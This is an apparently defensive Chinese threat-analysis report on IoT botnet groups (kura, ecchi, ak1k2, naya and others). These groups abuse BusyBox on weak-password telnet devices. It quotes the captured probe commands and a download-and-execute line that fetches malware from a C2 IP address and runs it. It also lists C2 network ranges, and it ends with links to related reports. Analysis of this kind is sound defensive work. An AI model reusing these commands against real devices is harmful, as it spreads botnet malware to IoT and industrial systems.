原創 | 利用BusyBox組件進行物聯網設備攻擊的黑客組織惡意行為分析報告

2021-02-19 網絡安全應急技術國家工程實驗室

作者 | 張家琦  劉中金

BusyBox是嵌入式Linux的常用組件,被稱為「嵌入式Linux中的瑞士軍刀」。它將常用的UNIX命令集成到一個可執行文件中。通過功能精簡、共享代碼等方法,BusyBox保留了最常用的功能,同時大大壓縮了可執行文件的大小。一般而言,BusyBox可執行文件只有5MB左右,而Ubuntu或CentOS等完整的Linux發行版本至少需要數百MB空間。因此,BusyBox為小型嵌入式Linux提供了一個相對完整的POSIX環境,被廣泛應用於路由器、攝像頭、智能設備等基於嵌入式Linux的設備上。BusyBox的主要目錄結構、主要命令集合和使用方式如下[1][2]。

BusyBox中的命令集合如表 2所示。BusyBox中包含了ls、cat和echo等命令和grep、find、telnetd等常用組件。

BusyBox安裝後,會存放在/bin目錄下。通過運行/bin/busybox <applet>命令,就可以執行<applet>指定的功能。例如:為了進一步簡化命令,BusyBox還提供了符號連結功能,例如:

‍2BusyBox在物聯網設備中應用廣泛,安全問題湧現

由於BusyBox容易編譯、配置和使用,它在嵌入式Linux作業系統中應用廣泛。許多網關、攝像頭類物聯網設備中運行的openwrt、buildroot等固件或工具,均使用BusyBox組件。自2010年以來,BusyBox共暴露出17個漏洞。其中,CVE評分在7分以上的有4個,如表3所示。另一方面,由於BusyBox在物聯網領域的廣泛應用,BusyBox成為物聯網設備區別於通用計算設備的一個重要標誌,經常被物聯網黑客組織用於探測、判斷聯網設備是否為物聯網設備。同時,由於集成了大量基本工具,BusyBox也成為了黑客組織用於執行代碼植入和遠程命令執行等攻擊的重要手段。Mirai,Hajime、Bashlite等物聯網殭屍網絡和攻擊手法均通過探測BusyBox組件來選取攻擊目標,繼而執行遠程攻擊命令[3]-[5]。
因此,我們最近監測了利用BusyBox組件的網絡行為,發現了大量利用BusyBox組件執行遠程命令的行為,涉及的常見埠的協議類型如所示。其中,telnet協議的流量最多,大約佔比91%。

3利用BusyBox組件進行特定物聯網設備攻擊的案例

( 1 ) 案例概述以下是一個開放23埠的聯網工控設備遭受攻擊的案例。該設備為M公司型號為UC-XXXX的控制器,是一款基於ARM的工業控制器。被攻擊設備存在弱口令漏洞,遭受到暴力破解等遠程攻擊,攻擊成功的命令交互情況如圖 1所示。

cat /proc/mounts; /bin/busybox OAOGL

rootfs / rootfs rw 0 0/dev/root / jffs2 ro 0 0/proc /proc proc rw 0/dev/ram0 /var ext2 rw 0 0/dev/mtdblock3 /var/tmp jffs2 rw 0 0/dev/mtdblock3 /home jffs2 rw 0 0/dev/mtdblock3 /etc jffs2 rw 0 0/dev/mtdblock3 /usr/bin jffs2 rw 0 0OAOGL: applet not found 

該黑客攻擊語句分為兩部分,一是功能執行部分,這裡對應「cat /proc/mounts」命令,用來查看/proc是否被加載;二是執行結束標記,對應「/bin/busybox OAOGL」這條命令,用於使伺服器返回「OAOGL:applet not found\r\n」消息,從而使攻擊方知道上條命令已執行完畢。其中,/bin/busyboxTOKEN中的TOKEN欄位通常由各個惡意軟體攻擊手法自行定義。一般可以認為,採用相同TOKEN的攻擊手法大概率具有同源性。

基於觀察到黑客攻擊的命令模式,其攻擊手法執行流程有三個部分:測試部分、下載部分和惡意代碼運行部分。在測試部分,攻擊手法主要測試終端的運行環境。攻擊手法利用一系列的測試代碼,針對設備軟硬體環境進行探測。通過檢測特定的返回代碼,來判斷BusyBox運行環境、文件系統、CPU類型、進程數量等參數。幾個典型的測試代碼如下:

/bin/busybox ps; /bin/busybox TOKEN

ii. 測試CPU類型、文件系統、進程數量等系統參數

/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/ busybox rm /dev/.nippon

/bin/ busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/ busybox slav1337

iii. 測試是否存在wget、tftp等遠程傳輸工具

/bin/ busybox wget; /bin/ busybox tftp; /bin/ busybox TOKEN

在下載部分,攻擊手法主要利用wget、tftp或echo來植入惡意軟體。典型代碼如下:

/bin/busybox wget http://193.228.91.124:80/uih7u8jy7of7y8o9d6t68it67r8y76t7823tg8weuq/squidnet.x86 -o - > kurc;/bin/BusyBox chmod 777 kurc; /bin/BusyBox kura(TOKEN)

/bin/ busybox kurc; /bin/ busybox kura(TOKEN);

下面是兩個不同攻擊手法的示例。圖 2是TOKEN為Kura的攻擊手法的腳本特點。這一工具用echo -e命令掃描大量文件夾,用wget下載惡意代碼。

圖 3是TOKEN為slav1337的攻擊手法的腳本特點。這類攻擊手法一般首先檢查設備中是否存在BusyBox環境,然後檢查是否存在wget或tftp,最後通過wget、tftp或echo下載惡意代碼,如圖 3 ( a )。此外,這類攻擊手法中還存在大量用echo植入惡意代碼的行為,如圖 3 ( b )。

( a )

圖3 slav1337攻擊手法腳本特點

通常,同一個黑客組織使用的攻擊腳本、C2節點或殭屍主機存在一定的關聯性。為了發現攻擊手法與黑客組織的關聯,圖 4利用桑基圖進一步分析了有惡意代碼下載行為的攻擊手法及其殭屍主機、C2節點的通連關係。桑基圖是一類描述流量結構分布圖,描述了流量在各個節點之間的流量分布。每一個節點延伸的分支的寬度對應數據流量佔比的大小。圖 4的第一列節點表示攻擊手法,第二列和第三列節點分別表示殭屍主機和C2節點,最後一列表示其傳播的惡意代碼名稱。從攻擊手法節點延申出去的分支越細、越多,表明該攻擊手法利用的網絡資源越豐富,越分散;反之表明該攻擊手法利用的網絡資源越少,越集中。

( 1 ) 黑客組織攻擊手法利用的殭屍主機和C2節點都比較集中,也沒有與其他攻擊手法共用。典型代表是kura、ecchi、scylla和ak1k2,如圖 5。以kura為例,該攻擊手法主要利用了193.228.91.0網段的主機。其C2節點也大部分位於這個網段,傳播的惡意代碼名字也比較單一。典型惡意代碼名稱為squidnet和kiganet。

( 2 ) 第二類攻擊手法的桑基圖如圖 6。這類攻擊手法利用的網絡資源更加豐富,更加分散,且不同攻擊手法之間的網絡資源存在共用現象。如slav1337攻擊手法,該工具利用了多個殭屍網絡:85.92.108.0(荷蘭)、37.49.224.0(荷蘭)、45.95.168.0(匈牙利)。其中37.49.224.0和45.95.168.0這兩個網段的殭屍主機也被sora、unstable、meth、switchblades1等攻擊手法使用。從傳播惡意代碼的角度,這些攻擊手法的行為也呈現出不同的特點。例如slav1337、unstable傳播的惡意代碼比較多。sora、lizrd和naya則只傳播一種惡意代碼。

綜上,一部分攻擊手法的網絡資源相對比較獨立,同時傳播的惡意代碼名稱也比較單一,與其他攻擊手法區別明顯,可以認為屬於不同的黑客組織,如第一類的kura、ecchi、ak1k2和第二類的naya。下文將對上述四個組織的網絡資源,地理分布、腳本特徵進一步深入分析和比較。為簡化描述,下文將用黑客組織攻擊手法採用的TOKEN指代該組織。

四個典型黑客組織的總體攻擊態勢如表 5。不同組織的網絡資源,主要是C2伺服器網段數量呈現一定的差異,kura、ak1k2、ecchi的C2伺服器分布比較集中,naya的C2伺服器分布較分散。各個組織的主要C2伺服器網段的分布情況如圖 7。

表6給出了典型黑客組織的主要C2節點歸屬國家。大部分組織的C2節點都位於美國和歐洲。圖8比較了四個攻擊手法攻擊目標的國內地理分布情況,排名前五位的省份分別是廣東、北京、遼寧、河北及浙江。各黑客組織攻擊目標排名前3 的省份及其受攻擊次數如表 7所示。不同組織在攻擊規模上略有差異,但選取的目標均為沿海發達城市和部分工業城市。

在攻擊手法的測試階段,黑客組織主要通過特定命令來測試攻擊目標的文件系統、CPU情況和網絡下載工具情況,我們比較了四個典型黑客組織的測試命令比例,如表 8。

按照是否存在文件掃描行為,可將攻擊手法測試階段行為模式分為兩類:第一類包括kura和ecchi,存在文件掃描行為,其中ecchi還存在大量CPU測試行為;第二類包括ak1k2和naya,不存在文件掃描行為。進一步觀察kura和ecchi的文件掃描命令,kura組織採用的典型命令是:

echo -e 'kami/dev' > /dev/.nippon;

echo -e 『jane/dev' > /dev/.nippon;

可以看出,雖然都存在文件掃描行為,kura和ecchi選擇了不同的文件掃描關鍵字。
在下載階段,攻擊手法大多採用wget和echo兩種方式向攻擊目標植入惡意代碼(tftp命令也有部分使用,但佔比很少,在此不做分析)。我們具體分析了kura、ecchi、ak1k2、naya四個典型組織的網絡植入方式如表 9。根據wget和echo的使用比例,可將網絡植入行為模式分為三類:第一類echo使用比例顯著高於wget,如ak1k2和naya;第二類echo使用比例與wget相當,如kura;第三類echo使用比例顯著低於wget,如ecchi。

通過對攻擊手法網絡資源、地理分布和行為模式的分析及對比,可以初步認為不同攻擊手法在網絡資源、行為模式上呈現出比較明顯的差異,而在地理分布上則比較類似。本報告分析了BusyBox組件對特定物聯網設備進行攻擊的惡意行為,初步得出以下結論:( 1 ) BusyBox被廣泛應用物聯網或工業控制網絡中。網絡中監測到了大量黑客組織利用BusyBox進行物聯網設備甄別及惡意代碼植入的行為。( 2 ) 利用BusyBox開展攻擊的各個黑客組織的攻擊手法和攻擊習慣呈現出迥然不同的特徵。通過對黑客組織攻擊手法的TOKEN特徵、傳播路徑、惡意代碼進行關聯分析,能夠對黑客組織在攻擊手法關鍵字、網絡傳播路徑、測試方式、網絡植入方式等方面的差異進行洞察。( 3 ) 在分析中,我們也發現了後續可以繼續深入研究的方向:隨著開源社區的不斷活躍,越來越多的開源程序及組件會在物聯網設備上使用,比如web、telnet等第三方組件。這些組件也都有潛在的安全風險,會被黑客組織進行規模化利用。後續我們將關注不同的組件進行分析,以對物聯網供應鏈,組件層面的安全性進行剖析,以期了解物聯網設備底層系統及組件所面臨的廣泛或通用的安全風險。

參考文獻:

[1]BusyBox - The Swiss Army Knife of EmbeddedLinux. 

https://busybox.net/downloads/BusyBox.html

[2]BusyBox-Commands.https://boxmatrix.info/wiki/BusyBox-Commands

[3]New Trojan Virus Is Targeting IoT Devices. 

https://www.csoonline.com/article/3134720/new-trojan-virus-is-targeting-iot-devices.html.

[4]How does Mirai infect IoT?

https://security.stackexchange.com/questions/144754/how-does-mirai-infect-iot

[5]IoTMalware Evolves to Harvest Bots by Exploiting a Zero-day Home RouterVulnerability. https://unit42.paloaltonetworks.com/unit42-iot-malware-evolves-harvest-bots-exploiting-zero-day-home-router-vulnerability/

[6]BASHLITE Affects Devices Running on BusyBox.  

https://www.trendmicro.com/en_us/research/14/k/bashlite-affects-devices-running-on-BusyBox.html

相關焦點

  • 利用BusyBox組件進行物聯網設備攻擊的黑客組織惡意行為分析報告
    通過運行/bin/busybox <applet>命令,就可以執行<applet>指定的功能。例如:為了進一步簡化命令,BusyBox還提供了符號連結功能,例如:2BusyBox在物聯網設備中應用廣泛,安全問題湧現由於BusyBox容易編譯、配置和使用,它在嵌入式Linux作業系統中應用廣泛。
  • 工控十大網絡攻擊武器分析報告
    報告稱攻擊者已經在目標網絡中潛伏將近一年,在建立立足點以後,攻擊者使用多種工具進行偵查、橫向移動以及持久化。從上述的攻擊事件可以看出,工控行業的攻擊從未有所停止,反而更加的頻繁,這些攻擊大多都是具有經濟目的和政治動機的。大都前期利用間諜軟體進行情報獲取,試圖通過情報信息的分析來確定其下一步攻擊,部分攻擊已經切實的導致設備停機網絡斷電等嚴重後果。
  • [系統安全] 三十一.惡意代碼檢測(1)惡意代碼攻擊溯源及惡意樣本分析
    同時,面對可持續、高威脅、高複雜的大規模網絡攻擊,沒有深入分析攻擊組織之間的關係,缺乏利用深層次惡意代碼的語義知識,後續學術界也提出了一些解決措施。下圖展示了Lazarus盜竊孟加拉國央行的行動流程,通過Alreay攻擊組件篡改SWIFT軟體,使得黑客能夠操作銀行帳號任意進行轉帳,從而竊取了8100萬美元。
  • 啟明星辰ADLab:工控十大網絡攻擊武器分析報告
    報告稱攻擊者已經在目標網絡中潛伏將近一年,在建立立足點以後,攻擊者使用多種工具進行偵查、橫向移動以及持久化。從上述的攻擊事件可以看出,工控行業的攻擊從未有所停止,反而更加的頻繁,這些攻擊大多都是具有經濟目的和政治動機的。大都前期利用間諜軟體進行情報獲取,試圖通過情報信息的分析來確定其下一步攻擊,部分攻擊已經切實的導致設備停機網絡斷電等嚴重後果。
  • 39起能源電力領域網絡攻擊事件匯總|工控十大網絡攻擊武器分析報告
    報告稱攻擊者已經在目標網絡中潛伏將近一年,在建立立足點以後,攻擊者使用多種工具進行偵查、橫向移動以及持久化。從上述的攻擊事件可以看出,工控行業的攻擊從未有所停止,反而更加的頻繁,這些攻擊大多都是具有經濟目的和政治動機的。大都前期利用間諜軟體進行情報獲取,試圖通過情報信息的分析來確定其下一步攻擊,部分攻擊已經切實的導致設備停機網絡斷電等嚴重後果。
  • Outlaw黑客組織武器更新分析
    自從去年6月以來該組織一直保持沉默,在12月活動有所增加。研究人員發現該組織對武器功能進行了更新,擴展了掃描程序的參數和目標,改進了規避技術,提高了攻擊帶來的經濟利益。這些工具旨在竊取汽車和金融行業信息,對目標系統發動後續攻擊和出售被盜信息。
  • 原創 | FreakOut分析報告
    今年1月上旬,CNCERT物聯網威脅分析團隊通過實時運轉的數據平臺捕獲到一種未知惡意程序out.py,它的典型傳播域名為gxbrowser.net
  • 安全報告 | SSH 暴力破解趨勢:從雲平臺向物聯網設備遷移
    上篇報告從 DDoS 攻擊的角度揭示了雲上攻擊最新趨勢,本篇由同一技術團隊雲鼎實驗室分享:「SSH 暴力破解趨勢:從雲平臺向物聯網設備遷移 」, 以下簡稱《報告》。SSH 暴力破解是什麼?雲鼎實驗室在本篇《報告》中,對 SSH 暴力破解攻擊從攻擊者使用的攻擊字典、攻擊目標、攻擊源地域分布、惡意文件等維度,以及捕獲的攻擊案例進行趨勢分析。由於虛擬貨幣的興起,攻擊者不再僅僅利用通過 SSH 暴力破解控制的設備來進行 DDoS 攻擊,還用來挖礦,牟取利益。
  • 西方紅玫瑰和辣條先生黑產組織深度分析報告
    報告摘要近期,神州網雲依靠高級威脅檢測引擎並結合天際友盟的威脅情報,精確發現了多起高級威脅組織的攻擊,通過快速有效的一鍵溯源確定了攻擊行為及影響。近期發現並確認了兩個威脅組織利用Struts2的安全漏洞攻擊行為,下載並執行不同的木馬程序進行攻擊獲利。「西方紅玫瑰」利用一個位於歐洲的ISP網絡進行Struts2攻擊,主要針對Linux平臺來下載執行比特幣挖礦程序進行獲利。「辣條先生」至少擁有5年左右的黑產活動經歷,利用中國江西電信網絡長期進行各種威脅活動。
  • 響尾蛇(SideWinder)組織利用WebSocket隧道的新型攻擊活動披露
    360高級威脅研究院曾捕獲過該組織的多次重要攻擊行動,我們發現該組織一直在持續更新攻擊技術,與安全廠商進行攻防對抗,其中一些攻擊並未被外界公開披露過。本報告將對該組織的部分未公開樣本進行深入分析披露,相關的攻擊最早曾在2019年底出現,而在今年9月期間又重新出現活動跡象,期望此次分析可以讓業界更好地完善該組織的攻擊拼圖。
  • 中國再次發現來自海外的黑客攻擊:蔓靈花攻擊行動
    可以說,網絡空間成為大國博弈新的制高點,網絡安全也成為國家安全的重要領域。網絡安全對於國家的政治安全、經濟安全、文化安全、軍事安全都會產生深刻影響。在2016年美國總統大選中,黑客組織利用APT攻擊獲得並洩露了美國民主黨郵件和文件,給民主黨總統候選人希拉蕊造成了極大的負面影響。APT攻擊對國家政治的影響由此可見一斑。
  • 瑞星網絡攻擊報告:黑客組織TA505近期網絡攻擊分析
    據韓國安全人員發布的統計信息,已發現的有上千個公司郵箱收到惡意郵件。攻擊者一旦攻擊成功,受害者機器就會被遠程控制,導致重要信息被竊取。攻擊者還可以通過竊取的帳號密碼等信息,進一步攻擊內網中的其它機器,投遞其它木馬、病毒或勒索軟體,攻擊者還可能通過竊取的帳號密碼信息,竊取用戶的銀行帳戶。或是把竊取的信息販賣給其它犯罪團夥,從事其它犯罪行為。
  • Stealth Falcon黑客組織無文件後門分析
    citizen lab機構在2016年發表了一份針對某一網絡攻擊的分析報告。2019年1月,路透社發表了一份關於「Raven計劃」的調查報告,該計劃目標與Stealth Falcon相同。根據這兩份關於同一目標和攻擊的報告可以看出Stealth Falcon和Raven計劃實際上是同一個群體。
  • APT追蹤:Transparent Tribe惡意組織演變分析(上)
    Transparent Tribe(又稱為PROJECTM和MYTHIC LEOPARD),是一個高產出的惡意組織,其活動最早可以追溯到2013年。Proofpoint在2016年發表了一篇有關該惡意組織的文章,自當時起,我們就一直關注這一惡意組織。在APT威脅情報報告中,我們向訂閱該服務的用戶定期報告惡意組織的活動,在過去的四年之中,這個APT組織從未休息。
  • 印度黑客組織近期網絡攻擊活動及洩露武器分析
    2012年以來,安天針對印度方向的網絡攻擊進行了持續的跟蹤與分析,追蹤其攻擊行動、溯源其幕後團夥,多年以來持續曝光相關攻擊活動,震懾印方攻擊組織。安天於2016年7月發布報告「白象的舞步——來自南亞次大陸的網絡攻擊」[1];2017年12月發布報告「潛伏的象群—來自印方的系列網絡攻擊組織和行動」[2];2019年5月發布報告「響尾蛇(SideWinder)APT組織針對南亞國家的定向攻擊事件」[3];2020年1月發布報告「摺紙行動:針對南亞多國軍政機構的網絡攻擊」[4]。
  • FreakOut分析報告
    綠盟科技伏影實驗室對該程序樣本、傳播Payload等進行深入研究,並與開源情報進行比對,確認它是一種新型殭屍網絡家族。1月中下旬,多家國內外公司也發現了這個惡意程序,由於它的名稱為out.py,且關聯到的攻擊者代號為Freak,因此該家族被命名為FreakOut。
  • 對 Sofacy 黑客組織近期開始使用的 DDE 攻擊手段進行分析
    Unit 42和其他機構在2018年上半年展示了這個黑客組織是如何繼續針對世界各地的多個組織(主要是在北美和歐洲的政府、外交和其他戰略組織)的。繼2018年2月和3月我們對Sofacy最新的研究之後,我們發現了一項新的攻擊活動,它使用了一種被廣泛認為是屬於Sofacy組織的不太知名的工具Zebrocy。
  • 記烏克蘭一起「使用物聯網設備為跳板」的攻擊活動
    近期,安恆威脅情報中心監測到一起通過rtf文檔漏洞投遞惡意文檔的攻擊活動,獵影實驗室對之進行了分析,該活動攻擊目標地區似為烏克蘭。在攻擊活動中發現攻擊者使用物聯網設備(華碩路由設備)作為C2回連及數據存儲,攻擊者似乎對Discord(一款專為電子遊戲社區設計的免費網絡即時通訊軟體)和Telegram(即時通訊軟體)的數據感興趣,通過關聯分析,基本確信該活動的始作俑者為烏克蘭一名大學生。
  • 物聯網安全研究之二:IoT系統攻擊面定義分析
    依據前文我們定義的IoT體系結構,現在我們可以非常清晰地分離出物聯網系統的各種組件,並嘗試為每種組件定義攻擊面,各種組件的攻擊面組合將形成一個整體的物聯網生態系統攻擊面。我之所以把它稱為物聯網生態系統而不是物聯網產品,是因為它確實是一個由不同組件組成的生態系統,它們相互通信並解決特定的現實問題。
  • 隔離網絡高級威脅攻擊預警分析報告
    下面會著重分析其對安全隔離網絡的攻擊手段,以供業界參考發現和防護此類高級威脅攻擊。此次披露的CIA網絡武器主要針對微軟Windows作業系統進行攻擊,通過USB存儲介質對安全隔離網絡進行滲透攻擊和竊取數據:首先,它會攻擊與目標相關聯的可以連接網際網路的計算機,在計算機中植入惡意感染程序。